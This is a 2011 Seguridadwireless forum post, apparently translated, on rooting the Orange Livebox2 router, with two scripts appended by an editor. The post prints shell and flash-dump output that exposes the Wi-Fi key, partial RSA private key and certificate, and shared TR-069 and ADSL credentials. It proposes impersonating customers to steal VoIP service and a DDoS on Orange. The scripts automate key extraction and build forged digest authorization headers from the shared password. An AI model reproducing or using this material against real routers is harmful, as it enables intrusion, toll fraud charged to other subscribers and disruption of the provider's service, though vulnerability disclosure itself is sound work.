Title: Seguridadwireless has unlocked the Orange Livebox2 router
Posted by: ChimoC on 23 July 2011, 09:31 am

Seguridad Wireless unlocks the Orange Livebox2 router.
All Orange routers use the same default usernames and passwords for the telnet connection, so once we are inside the router we can obtain this information and grant ourselves superuser privileges.

The original version and the current version of the Livebox2 router:

Quote:
(version(4.0.21.3.3.1.32.1.1.1.6))
(external_version(FAST3yyy_691252))
(release(Jan 14 2010))
(distribution(LIC=/filer1_vol7/dev_projets3/rg_ultimate/dev/daniel/mini/OSP/4.3.23_691252/lastcheckout/license/jpkg_fast3202.lic DIST=FAST3202_SP_LBV2ULT))

(version(4.0.21.3.3.1.32.1.1.1.6))
(external_version(FAST3yyy_69127A))
(release(Apr 26 2011))
(distribution(LIC=/filer1_vol7/dev_projets3/rg_ultimate/dev/daniel/mini/OSP/4.3.48_BIS_691272/lastcheckout/license/jpkg_fast3202.lic DIST=FAST3202_SP_LBV2ULT))

What we get with this: full control of the router. And what is that good for? Let's take a look at the help the router offers (the output below is reproduced as the firmware prints it, spelling included):

Quote:
[root @ home]$ help all
Command Category terminal - Commands to control Livebox execution
  exit                     Exit sub menu
  ls                       List sub menu contents
  home                     Go back to home directory
  die                      Exit from Livebox and return ret
  ps                       Print Livebox's tasks
  entity_close             Close an entity
Command Category igmp - IGMP Proxy related commands
  igmp_status              Print IGMP subscription of device
  igmp_reset               Clear all IGMP subscriptions
Command Category dns_route - Dyncamic Routing according to DNS replies
  dyn_route_print          Print Dynamic Routes
  dyn_route_del            Delete Dynamic Routes
Command Category pvc - PVC scan related commands
  pvc_scan                 Scan predefined vpi.vci to determine PPP protocol
  pvc_scan_restart         Restart PVC scan
  pvc_scan_status          Display PVC scan status
Command Category rg_conf - Read and write Livebox configuration data
  rg_conf_print            Print Livebox configuration
  rg_conf_set              Set Livebox configuration path to value
  rg_conf_set_obscure      Set Livebox configuration path to an obscured value
  rg_conf_del              Delete subtree from Livebox configuration
  rg_conf_ram_set          Set Livebox dynamic configuration
  rg_conf_ram_print        Print Livebox dynamic configuration
  rg_conf_ram_del          Delete subtree from Livebox dynamic configuration
  reconf                   Reconfigure the system according to the current Livebox configuration
Command Category ffs - Flash file system
  ffs_mount                Mount FFS device
  ffs_umount               Unmount FFS device
  ffs_format               Format FFS device
Command Category mii - MII Low level control
  mii_dev_link_status_get  Get Link Status for all device ports using MII
  mii_phy_reg_get          Get PHY MII register value
  mii_phy_reg_set          Set PHY MII register value
  mii_eth_reg_get          Get Ethernet MII register value
  mii_eth_reg_set          Set Ethernet MII register value
Command Category FT wlan commands - FT wlan commands
  wlan                     wlan
Command Category FT commands - FT commands
  save                     Save configurating to flash
  flash_chksum             Display all flash sections checksums
Command Category FT adsl commands - FT adsl commands
  adsl                     adsl
Command Category FT atm commands - FT atm commands
  atm                      atm
Command Category FT sndcp commands - FT sndcp commands
  sndcp                    sndcp
Command Category bluetooth_ssi - API for communication between OpenRG & Bluetooth hcid
  ssi_bluetooth_acl_check
  ssi_bluetooth_device_connected
  ssi_ctp_tl_connected
  ssi_ctp_tl_disconnected
Command Category rmt_mng - Remote Management Commands
  rmt_mng_enable
  rmt_mng_login
  rmt_mng_add_user
Command Category firewall - Control and display Firewall and NAT data
  fw_restart               Stop and start Firewall & NAT
  fw_start                 Start Firewall & NAT
  fw_stop                  Stop Firewall & NAT
  fw_filter                Turn Firewall packet inspection on/off
  mac_cache_dump           Dump MAC cache data
  fw_dump                  Dispaly Firewall data
  fw_variable              Display variables of the firewall rules
  fw_trace                 Trace packet traversal via the Firewall ruleset
Command Category cmd - Commands related to the Command module
  help                     Commands Help
Command Category tasks - API for Livebox tasks
  host                     Resolve host by name
  bridge_info              Print bridge information
  vlan_add                 Add VLAN interface
Command Category debug - Debug Livebox
  sys_ioctl                issue openrg ioctl
  etask_list_dump          Dump back trace of all etasks
  meminfo                  Print memory information
Command Category log - Contorols Livebox logging behaviour
  cat_log                  Prints or deletes contents of log to console
  log_lev_on               Redirect rg_error output equal to or higher than level to the current console.
  log_lev_off              Stop rg_error redirection to the current console
Command Category terminal - Commands to contorol Livebox execution
  exit                     Exit sub menu
  ls                       List sub menu contents
  home                     Go back to home directory
  die                      Exit from Livebox and return ret
  ps                       Print Livebox's tasks
  entity_close             Close an entity
Command Category main_task - main_task commands
  reboot                   Reboot the system
  rg_ifconfig              List Livebox Network Devices
  cat                      Print file contents to console
  shell                    Spawn busybox shell in foreground
  restore_default          Restore default configuration
  erase                    Restore default configuration
  exec                     Execute program
  print_main_wan           Print the name of the current main wan device
  route                    Print route table
  ver                      Display version information
  date                     Print the current UTC and local time
  version                  Display version information for installation
  show                     Display version information for production
Command Category flash - Flash and loader related commands
  flash_commit             Save Livebox configuration to flash
  flash_erase              Erase a given section in the flash
  load                     Load and burn image
  loadapp                  Load and burn image app1 or app2
  boot                     Boot the system
  flash_layout             Print the flash layout and content
  flash_dump               Dump the flash content
  lock                     Lock mtd region
  unlock                   Unlock mtd region
  bset                     Configure bootloader
  ifconfig                 Configure network interface
  ping                     Test network connectivity
Returned 0

As you can see, this is the complete list of the router's configuration commands.
Let's look for the default Wi-Fi key.

Wi-Fi key (burned into the BOOT section of the flash):

Quote:
[root @ home]$ flash_dump -s BOOT | -r 0x00018350 -l 0x00000020
00018350: 00 32 35 44 43 34 43 43 ** ** ** ** ** ** ** ** |.25DC4CC********|
00018360: ** ** ** ** ** ** ** ** ** ** ** 00 00 00 00 00 |***********.....|

The same key is also found inside the router in the following file, which is the one reloaded from that burned-in value every time the router is reset (note that NW_KEY below starts with the same characters as the bytes at 0x18351):

Quote:
/etc # cat wsc_config.txt
#######################################################
# VAP 1 config section
#######################################################
# Simple Config Configuration File
# Lines that start with # are treated as comments
# Each line should not exceed 80 characters
# Format: TYPE=value
#
START_OF_VAP_CONFIG_1
# Configured Mode: 1=Unconfigured AP, 2=Client, 3=Registrar,
# 4=AP with Proxy, 5 = AP with Proxy and Registrar
CONFIGURED_MODE=5
# Is the standalone Registrar (mode 3) wireless-enabled
# Yes: 1, No:0
REGISTRAR_WIRELESS=1
# Should UPnP be used (for modes 1 and 3)
# Yes: 1, No:0
USE_UPNP=0
UUID=0x00269*****************
VERSION=0x10
DEVICE_NAME=Livebox2-4***
# Primary Device Categories: Please refer to the SC spec for
# values for the following types
PRI_DEV_CATEGORY=6
PRI_DEV_OUI=0x50f204
PRI_DEV_SUB_CATEGORY=1
# MAC Address of the local device, 6 byte value
MAC_ADDRESS=0x0026*******
MANUFACTURER=Sagem
MODEL_NAME=Livebox2
MODEL_NUMBER=Livebox2
SERIAL_NUMBER=LK101*****
# Config Methods: bitwise OR of values
CONFIG_METHODS=0x188
# Auth type flags: bitwise OR of values
AUTH_TYPE_FLAGS=0x20
# Encr type flags: bitwise OR of values
ENCR_TYPE_FLAGS=0x8
CONN_TYPE_FLAGS=0x1
RF_BAND=1
OS_VER=0x80000000
FEATURE_ID=0x80000000
# SSID:
# For unconfigured client: What it should connect to when
# starting EAP-WSC
# Example: SSID=WscSecureAP
# For unconfigured AP: Initial broadcast SSID
# Example: SSID=WscNewAP
# For Registrar: SSID that the supplicant must connect to when
# starting EAP-WSC
# Example: SSID=WscNewAP
# For AP with Registrar: Broadcast SSID
# Example: SSID=WscSecureAP
SSID=Orange-xxxx
# Key Mgmt for Supplicant (Client, Registrar):
# Unconfigured, doing WSC: WPA-EAP IEEE8021X
# Configured after WSC (will be done by the s/w): WPA-PSK
# Key Mgmt for Hostapd (AP, AP with Registrar):
# Unconfigured, doing WSC: WPA-EAP
# Configured after WSC (will be done by the s/w): WPA-PSK
# Configured, plus Registrar: WPA-EAP WPA-PSK
KEY_MGMT=WPA-EAP WPA-PSK
# Are we using a USB key to transfer PIN/Credential?
# Yes: 1, No:0
USB_KEY=0
# Is the Network Key set?
# Yes: 0xValue or passphrase, No: comment out line
# NW_KEY=0x000102030405060708090A0B0C0D0E0F000102030405060708090A0B0C0D0E0F
# NW_KEY=passphrase
NW_KEY=25DC4CC**************
# DBG_LEVEL bit mask: 0:ERR, 1:INFO, 2:REG, 3:UPNP, 4:MC, 16:DBG
DBG_LEVEL=7
END_OF_VAP_CONFIG_1
#OTHER_NETWORK_CONF ssid config filenames, separate by spaces
OTHER_NETWORK_CONF=(null)
END_OF_CONFIG

Flash blocks:

Quote:
[root @ home]$ flash_layout
Flash layout:
Section 00 Type BOOT        Range 0x00000000-0x000A0000 MaxSize 0x000A0000 No more information.
Section 01 Type AUTOCONF    Range 0x000A0000-0x000C0000 MaxSize 0x00020000 No more information.
Section 02 Type USER        Range 0x000C0000-0x000E0000 MaxSize 0x00020000 No more information.
Section 03 Type SCRATCH PAD Range 0x000E0000-0x00100000 MaxSize 0x0001FF6C Uninitialized.
Section 04 Type USER        Range 0x00100000-0x00120000 MaxSize 0x00020000 No more information.
Section 05 Type FACTORY     Range 0x00120000-0x00140000 MaxSize 0x0001FF6C Size 0x000004D3 Name 'FACTORY' Checksum 0x00010B81 Counter 0x00000001 Start Offset 0x00000000
Section 06 Type LAYOUT      Range 0x00140000-0x00160000 MaxSize 0x0001FF6C Uninitialized.
Section 07 Type CONF        Range 0x00160000-0x00180000 MaxSize 0x0001FF6C Size 0x00003AA3 Name 'rg_conf' Checksum 0x001CF184 Counter 0x00000049 Start Offset 0x00000000
Section 08 Type CONF        Range 0x00180000-0x001A0000 MaxSize 0x0001FF6C Size 0x000038CE Name 'rg_conf' Checksum 0x001BF4EC Counter 0x00000046 Start Offset 0x00000000
Section 09 Type JFFS        Range 0x001A0000-0x00240000 MaxSize 0x000A0000 No more information.
Section 10 Type RECOVERY    Range 0x00240000-0x00580000 MaxSize 0x00340000 No more information.
Section 11 Type IMAGE       Range 0x00580000-0x01000000 MaxSize 0x00A80000 No more information.
Total 12 sections found.
Returned 0

Livebox shell:

Quote:
[root @ home]$ shell
BusyBox v1.01 (2005.09.07-07:38+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

/ # ls
automate  dsp    home   mnt   sys  var
bin       etc    hsdpa  proc  tmp
dev       fstab  lib    sbin  usr
/ # help
Built-in commands:
-------------------
        . : alias bg break cd chdir continue eval exec exit export false fg hash help jobs kill let local pwd read readonly return set shift times trap true type ulimit umask unalias unset wait

Unlocking the router's hidden pages, which provide many more options than Orange originally gives us. The blocks below are configuration subtrees in the router's rg_conf notation, with every entry set to 1.

Enabling every parameter in the pages configuration:

Quote:
(pages
  (hsiab(1))
  (livezoom(1))
  (visio(1))
  (community(1))
  (fax(1))
  (telephone(1))
  (tv(1))
  (vpn(1))
  (backuprestore(1))
  (licence(1))
  (log(1))
  (lockunlock(1))
)

Enabling every parameter in the network configuration:

Quote:
(network
  (ftth(1))
  (adsl(1))
  (3g(1))
  (pppoe(1))
  (pppoa(1))
  (dhcp(1))
  (ftlock(1))
  (h323(1))
  (sip(1))
  (tvrouted(1))
)

Enabling every parameter in the services configuration:

Quote:
(services
  (rtcphone(1))
  (universal_phone(1))
  (multitv(1))
  (professionnal(1))
  (residential(1))
  (testvoip(1))
  (wifipushbutton(1))
  (wifiwps(1))
  (wpspushbutton(1))
  (msgwaiting(1))
)

Enabling every parameter in the test configuration:
Quote:
(test
  (fmdev(1))
  (sipdev(1))
)

ADSL configuration: (http://www.seguridadwireless.net/livebox/vpvc.jpg)
Backup and restore: (http://www.seguridadwireless.net/livebox/guardare.jpg)
VPN: (http://www.seguridadwireless.net/livebox/vpnh.jpg)
LOG: (http://www.seguridadwireless.net/livebox/logyr.jpg)
FAX: (http://www.seguridadwireless.net/livebox/faxcj.jpg)
LIVEBOX COMMUNITY: (http://www.seguridadwireless.net/livebox/comunidadw.jpg)
HOTSPOT: (http://www.seguridadwireless.net/livebox/hospot.jpg)
LIVEZOOM: (http://www.seguridadwireless.net/livebox/livezoom.jpg)
VIDEO TELEPHONY: (http://www.seguridadwireless.net/livebox/videotelefono.jpg)
PPP CONFIGURATION: (http://www.seguridadwireless.net/livebox/shakespearelvb2.png)

Attacks that could be carried out against the Orange server.

User impersonation: we have the router's public and private certificates (parts have been removed so as not to compromise Orange's security):

Quote:
00018740: 47 49 4e 20 52 53 41 20 50 52 49 56 41 54 45 20 |GIN RSA PRIVATE |
00018750: 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 49 43 58 51 49 |KEY-----.MIICXQI|
00018760: 42 41 41 4b 42 67 51 44 78 75 34 51 55 6b 56 4d |BAAKBgQDxu4QUkVM|
00018770: 31 57 31 58 30 61 71 38 49 48 59 58 71 53 35 33 |1W1X0aq8IHYXqS53|
00018780: 6c 71 36 51 4b 69 31 6a 73 30 65 66 57 42 67 6a |lq6QKi1js0efWBgj|
00018790: 43 6e 4a 55 63 30 72 4d 32 0a 70 70 67 77 77 57 |CnJUc0rM2.ppgwwW|
000187a0: 45 5a 36 35 45 31 54 4a 71 63 70 33 37 4e 6f 66 |EZ65E1TJqcp37Nof|
000187b0: 2b 4a 36 62 56 36 37 38 42 59 72 36 74 5a 56 2b |+J6bV678BYr6tZV+|
000187c0: 33 79 41 63 2b 61 56 6f 63 74 54 46 42 4f 4e 4c |3yAc+aVoctTFBONL|
000187d0: 31 71 57 6b 6f 62 65 57 78 59 0a 57 42 39 66 75 |1qWkobeWxY.WB9fu|
000187e0: 2b 7a 75 6d 71 44 30 65 73 79 65 34 58 6b 68 52 |+zumqD0esye4XkhR|
000187f0: 66 70 67 78 6a 35 63 61 41 75 76 76 6f 5a 51 70 |fpgxj5caAuvvoZQp|
00018800: 6d 7a 43 35 79 4e 74 58 47 6f 57 6c 7a 54 76 74 |mzC5yNtXGoWlzTvt|
00018810: 39 64 33 6f 51 49 44 41 51 41 42 0a 41 6f 47 41 |9d3oQIDAQAB.AoGA|
00018820: 45 75 77 45 75 4c 39 76 62 66 76 4b 54 4b 6d 56 |EuwEuL9vbfvKTKmV|
00018830: 4c 65 4e 78 75 68 64 56 4d 73 63 75 76 67 79 4f |LeNxuhdVMscuvgyO|
00018840: 56 32 74 4f 35 48 66 77 63 35 74 69 4b 4c 46 74 |V2tO5Hfwc5tiKLFt|
00018850: 69 64 65 63 6a 69 52 30 2f 31 78 72 0a 4c 32 72 |idecjiR0/1xr.L2r|
00018860: 68 70 32 57 4e 44 58 65 69 30 78 37 53 4c 39 39 |hp2WNDXei0x7SL99|
00018870: 59 68 52 69 72 4a 74 6f 2f 4b 70 43 62 73 66 35 |YhRirJto/KpCbsf5|
00018880: 51 79 65 52 71 58 4e 57 6f 61 6d 71 37 46 4a 79 |QyeRqXNWoamq7FJy|
00018890: 66 50 61 62 4c 32 38 79 4e 41 4e 46 49 0a 4e 52 |fPabL28yNANFI.NR|
000188a0: 42 54 50 38 6e 30 70 46 6f 78 51 50 52 50 6e 4e |BTP8n0pFoxQPRPnN|
000188b0: 33 58 65 4b 52 6d 58 47 67 4b 47 70 79 77 74 54 |3XeKRmXGgKGpywtT|
000188c0: 52 38 31 39 67 36 69 54 44 6b 48 4d 6b 43 51 51 |R819g6iTDkHMkCQQ|
000188d0: 44 2f 36 2f 68 74 30 4e 63 76 38 55 72 43 0a 5a |D/6/ht0Ncv8UrC.Z|
000188e0: 70 72 53 6b 47 6f 73 71 4e 4e 44 52 6e 39 36 47 |prSkGosqNNDRn96G|
000188f0: 76 55 33 7a 36 62 68 50 46 69 76 4c 30 37 54 38 |vU3z6bhPFivL07T8|
00018900: 44 6c 65 78 45 70 76 54 44 55 33 6a 49 67 77 59 |DlexEpvTDU3jIgwY|
00018910: 69 2f 66 6b 6c 79 41 2f 64 6c 54 55 48 67 2f 0a |i/fklyA/dlTUHg/.|
00018a90: 46 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 |F.-----END RSA P|
00018aa0: 52 49 56 41 54 45 20 4b 45 59 2d 2d 2d 2d 2d 0a |RIVATE KEY-----.|
________________________________________
00018f30: 00 00 00 00 00 00 00 00 00 2d 2d 2d 2d 2d 42 45 |.........-----BE|
00018f40: 47 49 4e 20 43 45 52 54 49 46 49 43 41 54 45 2d |GIN CERTIFICATE-|
00018f50: 2d 2d 2d 2d 0a 4d 49 49 43 2b 6a 43 43 41 65 4b |----.MIIC+jCCAeK|
00018f60: 67 41 77 49 42 41 67 49 50 54 45 73 78 4d 44 45 |gAwIBAgIPTEsxMDE|
00018f70: 79 4e 55 52 51 4d 6a 49 77 4d 7a 51 32 4d 41 30 |yNURQMjIwMzQ2MA0|
00018f80: 47 43 53 71 47 53 49 62 33 44 51 45 42 42 51 55 |GCSqGSIb3DQEBBQU|
00018f90: 41 4d 44 55 78 0a 43 7a 41 4a 42 67 4e 56 42 41 |AMDUx.CzAJBgNVBA|
00018fa0: 59 54 41 6b 5a 53 4d 51 34 77 44 41 59 44 56 51 |YTAkZSMQ4wDAYDVQ|
00018fb0: 51 44 45 77 56 54 51 55 64 46 54 54 45 57 4d 42 |QDEwVTQUdFTTEWMB|
00018fc0: 51 47 41 31 55 45 43 78 4d 4e 54 47 6c 32 5a 57 |QGA1UECxMNTGl2ZW|
00018fd0: 4a 76 65 43 42 54 0a 51 55 64 46 54 54 41 65 46 |JveCBT.QUdFTTAeF|
00018fe0: 77 30 78 4d 44 41 31 4d 44 55 78 4f 54 49 34 4d |w0xMDA1MDUxOTI4M|
00019360: 70 67 3d 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 43 45 |pg==.-----END CE|
00019370: 52 54 49 46 49 43 41 54 45 2d 2d 2d 2d 2d 0a 00 |RTIFICATE-----..|

Once we have these we can pass ourselves off as another router, since they communicate using the TR-069 protocol. Every time the router boots it contacts the Orange server to obtain updates or the SIP provider configuration:

http://karma-sip.orange.com:80/fr/parameter_request

The credentials it uses are found in:

Quote:
/etc # cat parameters.txt
ACS_URL string https://karma.orange.com/krmx69/es
username string sage*****
password string ca******
ConnectionRequestPort unsignedInt 50805
IGD_Mngt_ConnectionRequestURLPath string /
ConnectionRequest_basic_auth_activate boolean 0
ConnectionRequest_digest_auth_activate boolean 1
ConnectionRequestBacklog unsignedInt 100
ConnectionRequestUsername string Default
ConnectionRequestPassword string orange
authrealm string gSOAP_Web_Service
id string LIVEBOX_ID_
send_http_opaque boolean 1
Maxenvelopes unsignedInt 1
receive_timeout unsignedInt 20
PeriodicInformInterval unsignedInt 432000
PeriodicInformTime unsignedInt 0
nbr_max_connection_request unsignedInt 50
ConnectionRequestPeriod unsignedInt 3600
id_activate boolean 1
PeriodicInformEnable boolean 1
DownloadSleepDuration unsignedInt 25
autonome_mode boolean 0
with_certif_exchange boolean 1
client_pem string /etc/client.pem
password_ssl string NULL
cacert_pem string /etc/cacert.pem
capath string NULL
ssl_randfile string NULL
comm_mode unsignedInt 2
/etc #

Note that this file enables certificate exchange with the ACS (with_certif_exchange 1) and points the client at /etc/client.pem and /etc/cacert.pem, which is why the RSA key and certificate recovered from the flash matter for impersonation. Note also that, while the ACS username and password are masked above, the connection-request listener on port 50805 uses digest authentication with the username Default and the password orange, shown in clear.

Therefore, we could impersonate another user, steal their VoIP credentials and call anywhere in the world from our smartphone, charging the calls to the other person.

DDoS against the Orange server: we modify the router so that, once it is connected to the server, it sends junk requests at the server and saturates it. Several routers doing this would leave Orange without VoIP service.

Structure of the hsdpa username:

XXXXXX-YYYYYYYYYYYYYYY@orangeBackup.net
XXXXXX - the beginning of the MAC address on the sticker.
YYYYYYYYYYYYYYY - the serial number on the sticker.
@orangeBackup.net - the suffix, the same for everyone.

Orange ADSL connection data:

Vpi: 8
Vci: 35
username: orangeuser@orangeadsl
password: orangeuser123

Windows application. Coming soon ......... (http://www.seguridadwireless.net/livebox/liveunlocker.jpg)

Android application. Coming soon ......... (http://www.seguridadwireless.net/livebox/liveunlocker2.jpg)

We hope that soon you will be able to enjoy, in moderation, full control of your Livebox2 router. This is only the beginning.

Team: Estudio de Cifrados
www.Seguridadwireless.net

SeguridadWireless - Vulnerability Disclosure Policy (http://www.seguridadwireless.net/avisolegal.php)
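The post recovers the Wi-Fi key and the PEM key/certificate by reading flash_dump output by eye. The script below is an added example (editor's code, not Seguridadwireless' tool and not firmware code) that does the same mechanically: it parses the hexdump format shown above into an offset-to-byte map, reads the NUL-terminated string at a given offset (the key sits one byte after 0x18350, behind a leading 0x00), locates every PEM object by its BEGIN/END markers, and maps any offset back to a section of the flash_layout table. The hexdump bytes are constructed for the example, since the real key is masked and the real PEM data is truncated on the page; "**" cells show how redacted bytes are carried through. The section table is copied from the page's flash_layout output.

```python
import re

# Constructed sample in the layout of the Livebox "flash_dump" output above.
# Byte values are made up for this example; "**" marks redacted cells.
SAMPLE_DUMP = """\
00018350: 00 32 35 44 43 34 43 43 41 42 43 44 45 46 30 31 |.25DC4CCABCDEF01|
00018360: 32 33 34 35 36 37 38 39 ** ** 43 00 00 00 00 00 |23456789**C.....|
00018370: 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 |-----BEGIN RSA P|
00018380: 52 49 56 41 54 45 20 4b 45 59 2d 2d 2d 2d 2d 0a |RIVATE KEY-----.|
00018390: 4d 49 49 43 58 51 49 42 41 41 4b 42 67 51 44 78 |MIICXQIBAAKBgQDx|
000183a0: 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 52 |.-----END RSA PR|
000183b0: 49 56 41 54 45 20 4b 45 59 2d 2d 2d 2d 2d 0a 00 |IVATE KEY-----..|
"""

# Section table taken from the flash_layout output on the page (trailing
# Size/Name/Checksum fields dropped; they are not needed here).
SAMPLE_LAYOUT = """\
Section 00 Type BOOT Range 0x00000000-0x000A0000 MaxSize 0x000A0000
Section 01 Type AUTOCONF Range 0x000A0000-0x000C0000 MaxSize 0x00020000
Section 02 Type USER Range 0x000C0000-0x000E0000 MaxSize 0x00020000
Section 03 Type SCRATCH PAD Range 0x000E0000-0x00100000 MaxSize 0x0001FF6C
Section 04 Type USER Range 0x00100000-0x00120000 MaxSize 0x00020000
Section 05 Type FACTORY Range 0x00120000-0x00140000 MaxSize 0x0001FF6C
Section 06 Type LAYOUT Range 0x00140000-0x00160000 MaxSize 0x0001FF6C
Section 07 Type CONF Range 0x00160000-0x00180000 MaxSize 0x0001FF6C
Section 08 Type CONF Range 0x00180000-0x001A0000 MaxSize 0x0001FF6C
Section 09 Type JFFS Range 0x001A0000-0x00240000 MaxSize 0x000A0000
Section 10 Type RECOVERY Range 0x00240000-0x00580000 MaxSize 0x00340000
Section 11 Type IMAGE Range 0x00580000-0x01000000 MaxSize 0x00A80000
"""

HEX_LINE = re.compile(r"^([0-9A-Fa-f]{8}):\s+((?:(?:[0-9A-Fa-f]{2}|\*\*)\s+)+)\|")
SECTION_RE = re.compile(r"Section (\d+) Type ([A-Z ]+?) Range 0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)")
PEM_RE = re.compile(rb"-----BEGIN ([A-Z ]+)-----.*?-----END \1-----", re.S)


def parse_flash_dump(text):
    """Map absolute flash offset -> byte value for every cell in the dump.
    Redacted "**" cells are stored as None so they are never mistaken for data."""
    mem = {}
    for line in text.splitlines():
        m = HEX_LINE.match(line)
        if not m:
            continue
        base = int(m.group(1), 16)
        for i, cell in enumerate(m.group(2).split()):
            mem[base + i] = None if cell == "**" else int(cell, 16)
    return mem


def cstring_at(mem, offset, maxlen=64):
    """Read the NUL-terminated ASCII string at `offset`; redacted bytes become '*'.
    Stops at the first NUL or at the first offset the dump does not cover."""
    out = []
    for off in range(offset, offset + maxlen):
        if off not in mem or mem[off] == 0:
            break
        out.append("*" if mem[off] is None else chr(mem[off]))
    return "".join(out)


def find_pem_blocks(mem):
    """Return [(absolute_offset, label, pem_text)] for each PEM object in the dump.
    Gaps between dumped lines and redacted cells are filled with 0x00, which
    does not disturb the BEGIN/END marker search."""
    if not mem:
        return []
    lo, hi = min(mem), max(mem) + 1
    blob = bytes(mem.get(o) or 0 for o in range(lo, hi))
    return [(lo + m.start(), m.group(1).decode(), m.group(0).decode("ascii", "replace"))
            for m in PEM_RE.finditer(blob)]


def parse_flash_layout(text):
    """[(index, type, start, end)] parsed from flash_layout output."""
    return [(int(n), t, int(a, 16), int(b, 16)) for n, t, a, b in SECTION_RE.findall(text)]


def section_for(layout, offset):
    """Type name of the flash section containing `offset`, or None if outside the flash."""
    for _, typ, start, end in layout:
        if start <= offset < end:
            return typ
    return None


if __name__ == "__main__":
    mem = parse_flash_dump(SAMPLE_DUMP)
    layout = parse_flash_layout(SAMPLE_LAYOUT)
    print("key:", cstring_at(mem, 0x18351), "in section", section_for(layout, 0x18351))
    for off, label, pem in find_pem_blocks(mem):
        print(f"{label} at 0x{off:06x} (section {section_for(layout, off)}):")
        print(pem)
```

Feed it the raw output of several flash_dump ranges concatenated and it will recover every PEM object whose BEGIN and END markers were dumped, even when the lines between them were left out, as in the post's redacted listing.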
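The parameters.txt listing shows the TR-069 side of the router: a per-device ACS login (masked), and a connection-request listener on port 50805 that authenticates the ACS with HTTP Digest using the username Default and the password orange. The example below is added here by the editor and is not part of the original post or of the Livebox firmware. It parses the "name type value" format into typed Python values, flags the settings that weaken the management channel, and models the listener's digest check (RFC 2617, MD5, qop=auth) so the effect of a shared password is concrete: any party that has read one router's parameters.txt can produce an Authorization header that every router with the same settings accepts. Assumptions: the listener uses the authrealm value as its digest realm, and the sample below replaces the masked ACS credentials with obvious placeholders; the set of shared passwords contains only the values visible on the page.

```python
import hashlib
import secrets

# Constructed sample in the "name type value" layout of /etc/parameters.txt
# above. Values are those visible on the page; the masked ACS username and
# password are replaced with placeholders.
SAMPLE_PARAMETERS = """\
ACS_URL string https://karma.orange.com/krmx69/es
username string sageXXXXX
password string caXXXXXX
ConnectionRequestPort unsignedInt 50805
IGD_Mngt_ConnectionRequestURLPath string /
ConnectionRequest_basic_auth_activate boolean 0
ConnectionRequest_digest_auth_activate boolean 1
ConnectionRequestUsername string Default
ConnectionRequestPassword string orange
authrealm string gSOAP_Web_Service
PeriodicInformInterval unsignedInt 432000
with_certif_exchange boolean 1
client_pem string /etc/client.pem
password_ssl string NULL
cacert_pem string /etc/cacert.pem
"""

# Connection-request passwords that appear on the page itself; anything in
# this set is shared across devices rather than specific to one router.
SHARED_CR_PASSWORDS = {"orange", "Default", ""}


def parse_parameters(text):
    """Parse 'name type value' lines into a dict with Python-typed values."""
    params = {}
    for line in text.splitlines():
        parts = line.split(None, 2)
        if len(parts) != 3:
            continue
        name, typ, value = parts
        if typ == "boolean":
            params[name] = value == "1"
        elif typ == "unsignedInt":
            params[name] = int(value)
        else:
            params[name] = None if value == "NULL" else value
    return params


def audit(params):
    """Return the findings that matter for the TR-069 management channel."""
    findings = []
    if params.get("ConnectionRequest_basic_auth_activate"):
        findings.append("connection request accepts Basic auth (password sent in clear)")
    if params.get("ConnectionRequestPassword") in SHARED_CR_PASSWORDS:
        findings.append("connection request password is a shared default")
    if (params.get("ACS_URL") or "").startswith("http://"):
        findings.append("ACS URL is plain HTTP")
    if not params.get("with_certif_exchange"):
        findings.append("no client certificate exchange with the ACS")
    return findings


def digest_response(username, realm, password, method, uri, nonce, nc, cnonce, qop="auth"):
    """RFC 2617 Digest response value (MD5, qop=auth)."""
    h = lambda s: hashlib.md5(s.encode()).hexdigest()
    ha1 = h(f"{username}:{realm}:{password}")
    ha2 = h(f"{method}:{uri}")
    return h(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")


def cpe_accepts(params, auth, method="GET"):
    """Model of the listener on ConnectionRequestPort: recompute the expected
    response from the stored ConnectionRequestUsername/Password (realm assumed
    to be authrealm) and compare in constant time. `auth` holds the fields of
    the Authorization header: username, realm, nonce, nc, cnonce, uri, response."""
    if not params.get("ConnectionRequest_digest_auth_activate"):
        return False
    if auth["username"] != params["ConnectionRequestUsername"] or auth["realm"] != params["authrealm"]:
        return False
    expected = digest_response(params["ConnectionRequestUsername"], params["authrealm"],
                               params["ConnectionRequestPassword"], method, auth["uri"],
                               auth["nonce"], auth["nc"], auth["cnonce"])
    return secrets.compare_digest(expected, auth["response"])


def build_connection_request_auth(params, nonce, cnonce="0a4f113b"):
    """Authorization fields any party holding the shared credentials can build
    for the connection-request URL, with nothing specific to the target device."""
    path = params["IGD_Mngt_ConnectionRequestURLPath"]
    user, realm, pw = params["ConnectionRequestUsername"], params["authrealm"], params["ConnectionRequestPassword"]
    return {"username": user, "realm": realm, "nonce": nonce, "nc": "00000001",
            "cnonce": cnonce, "uri": path,
            "response": digest_response(user, realm, pw, "GET", path, nonce, "00000001", cnonce)}


if __name__ == "__main__":
    p = parse_parameters(SAMPLE_PARAMETERS)
    for f in audit(p):
        print("finding:", f)
    auth = build_connection_request_auth(p, nonce=secrets.token_hex(8))
    print("listener accepts header built from shared credentials:", cpe_accepts(p, auth))
```

The digest helper is checked against the worked example in RFC 2617 section 3.5, so the listener model computes the same value a real HTTP Digest implementation would. Replacing ConnectionRequestPassword with a per-device secret is the single change that makes the pre-built header fail, which is the check the audit function encodes.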